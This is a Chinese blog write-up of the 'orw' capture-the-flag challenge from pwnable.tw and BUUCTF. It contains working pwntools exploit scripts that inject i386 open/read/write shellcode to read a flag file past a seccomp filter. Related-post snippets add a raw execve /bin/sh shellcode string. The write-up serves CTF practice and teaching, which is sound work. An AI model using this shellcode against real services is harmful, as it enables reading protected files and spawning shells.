pwnable_orw的wp

最新推荐文章于 2022-01-27 06:12:55 发布
最新推荐文章于 2022-01-27 06:12:55 发布
阅读量282 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyvle/article/details/114436244
版权

好像没见过这样的题
在这里插入图片描述
在这里插入图片描述
就汇编来讲,就是写入shellcode然后执行
其中orw_seccomp就是syscall的过滤,相当于一个白名单
在这里插入图片描述
大概构造

sys_open(filename="/home/orw/flag")
sys_read(fd=3,count=0x30)
sys_write(fd=1,count=0x30)

当打开一个新的文件时,文件描述符会在系统原有的0、1、2之上增加,POSIX标准要求每次打开文件时必须使用当前进程中最小可用的文件描述符,所以read在写入的时候调用的就是fd=3。

from pwn import *
filename="push 0x6761;push 0x6c662f77;push 0x726f2f65;push 0x6d6f682f"#/home/orw/flag的16进制
sys_open=";mov eax,0x5;mov ebx,esp;int 0x80;"#eax为5时,int80调用open,ebx是读取filename时栈内的起始位置
sys_read="mov eax,0x3;mov ebx,0x3;mov edx,0x30;int 0x80;"#eax为3时,int80调用read,ebx的值就是fd的值,edx则是count的值
sys_write="mov eax,0x4;mov ebx,0x1;mov edx,0x30;int 0x80;"
shellcode=filename+sys_open+sys_read+sys_write
payload=asm(shellcode)
s=remote('chall.pwnable.tw',10001)
s.recv(1024)
s.sendline(payload)
print s.recv()
s.interactive()

或者用shellcraft

#coding:utf-8
from pwn import *

context(os='linux',arch='i386',log_level='debug')

#sh = process('./orw')
sh = remote('node3.buuoj.cn','25658')

payload = shellcraft.i386.linux.open('flag',0)

payload += shellcraft.i386.linux.read(3,'esp',100)

payload += shellcraft.i386.linux.write(1, 'esp', 100)


sh.sendafter('Give my your shellcode:',asm(payload))

sh.interactive()
w0nderMaker
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF:pwnable_orw
qq_44768749的博客
08-27 1673
BUUCTF:pwnable_orw0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 32位程序,开启了canary保护 0x02 运行 提示输入shellcode 0x03 IDA main函数 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是
BUUCTF pwn——pwnable_orw
CNS-Enterprise BCC-1701-J
05-06 226
BUUCTF 做题练习
pwnable_orw
、moddemod
07-06 318
这道题应该是之前做过的… exp from pwn import * context(arch='i386', log_level='debug') p = remote('node3.buuoj.cn', 27912) payload = asm(shellcraft.open('./flag') + shellcraft.read('eax', 'esp', 0x30) + shellcraft.write(1, 'esp', 0x30)) p.sendafter('shellcode:', pa
[BUUCTF-pwn]——pwnable_orw
半岛铁盒的博客
06-12 1363
记一次ORW的题目 orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 32位程序,开启了canary 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是 Linux kernel 从2.6.23版本引入的一种简洁的 sandbox
BUUCTF pwnable_orw
weixin_45441024的博客
05-10 377
BUUCTF pwnable_orw 好久不更新博客了,在不更新显得好像自己真的瘦到95斤了似的,上题! 1)还是一如既往地check一下,可以看到程序开启了canary防护,其他的防护并未开启 2)运行一下这个程序,大概了解一下它的运行效果 3)分析这个函数,发现调用了两次prctl,这里决定了程序只能调用open,read,write函数,那我们就必须利用有限的条件来执行,这里有两种写法 ①手动添加汇编代码进行构造 #!/usr/bin/python2 #coding=utf-8 from pwn
orw_shellcode_模板
huzai9527的博客
05-23 1582
orw 64位 shellcode shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05" #pwntools context.arch = elf.arch shellcode = asm(shellcreaft.sh()) orw #pwntools shellcode = '' shellcode += shellcraft.open
setcontext+orw
「 虚幻私塾」
01-27 798
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 setcontext+orw 大致可以把2.27,2.29做为两个分界点。 我们先来讨论 2.27 及以下的 setcontext + orw 的写法。 首先 setcontext 是什么?了解过 SROP 的师傅应该知道 pwntools 自带了一款可以控制寄存器值的工具。模
[BUUCTF-pwn]——pwnable_orw   (ORW
Y_peak的博客
03-16 1198
[BUUCTF-pwn]——pwnable_orw 第一次碰到orw的问题,所谓orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 这个时候可以通过seccomptools,来查看 注意看到prctl就是将系统调用给你禁止了 exploit from pwn import * context.arch = 'i386' p = remote('node3.buuoj.cn',28626) shellcode = she
[BUUCTF]PWN——pwnable_orw
mcmuyanga的博客
11-10 1943
pwnable_orw 附件 步骤: 例行检查,32位程序,开启了canary 本地运行一下程序,看看大概的情况,提示我们输入shellcode 32位ida载入,检索字符串,没看见什么可以直接利用的,直接看main函数 orw_seccomp函数 prctl在百度后知道了是沙盒机制,具体的看这篇文章 prctl seccomp相当于内核中的一种安全机制,正常情况下,程序可以使用所有的syscall,但是当劫持程序流程之后通过exeve来呼叫syscall得到shell时seccomp边
pwnable.tw - orw
不急不躁
07-09 3034
简单概览 与 start 不同,该程序使用动态链接 提示仅允许有限的系统调用 open read write 函数 程序运行 哪怕是输入一个字母,程序仍然会出现段错误 检查安全措施 可见栈上开了 CANARY 程序 在 IDA 中反编译可见: 函数 orw_seccomp 反编译: 程序从终端读入内容,存放在 shellcode,然后执行该命令 ...
buuctf pwnable_orw
qq_42728977的博客
04-12 341
限制条件下的shellcode 参考链接: https://www.cnblogs.com/chrysanthemum/p/12323183.html http://www.chiange.com/pwnable-tw-orw/
pwnable.tw-orw
qq_35661990的博客
10-27 462
Read the flag from /home/orw/flag. Only open read write syscall are allowed to use. nc chall.pwnable.tw 10001 这是pwnable.tw orw的题目描述,只能用syscall只能用open、read、write 从ida看源代码 int __cdecl main(int ar...
BUUCTF pwnable_orw WP
weixin_44645415的博客
08-18 364
限制系统调用&&shellcode 1,文件分析 checksec Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 有canary保护,但是又有存在RWX权限的段,可以考虑写入shellcod
pwnable_orw 1
qq_46441427的博客
08-17 214
只能用read、open、write函数 那我们先open,然后read,最后write打印出来 from pwn import* p = remote('node4.buuoj.cn','25548') shellcode = asm('push 0x0;push 0x67616c66;mov ebx,esp;xor ecx,ecx;xor edx,edx;mov eax,0x5;int 0x80') shellcode += asm('mov eax,0x3;mov ecx,ebx;mov ebx
Pwnable.tw WP
AlexYoung28的博客
08-18 879
Pwnable.tw start 我们分析上图程序的汇编代码: 上图中的第一个方框,其实是将 : Let's start the CTF:  这句字符串压进栈; 第二个方框:其实是 system_write()函数, 参数中 fd =1, 说明是标准输出,也就是将 字符串打印输出在屏幕上; 第三个方框: 其实 标准输入函数,允许输入的长度是 3ch 也就是 60个字节; 但是buffe...
return orw();
最新发布
12-19
return orw()是一个函数调用表达式,它会调用名为orw()的函数,并将函数的返回值作为整个表达式的值返回。 在这个表达式中,orw()表示一个被定义的函数。函数调用的一般形式是函数名后跟一对括号,括号中可以包含...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值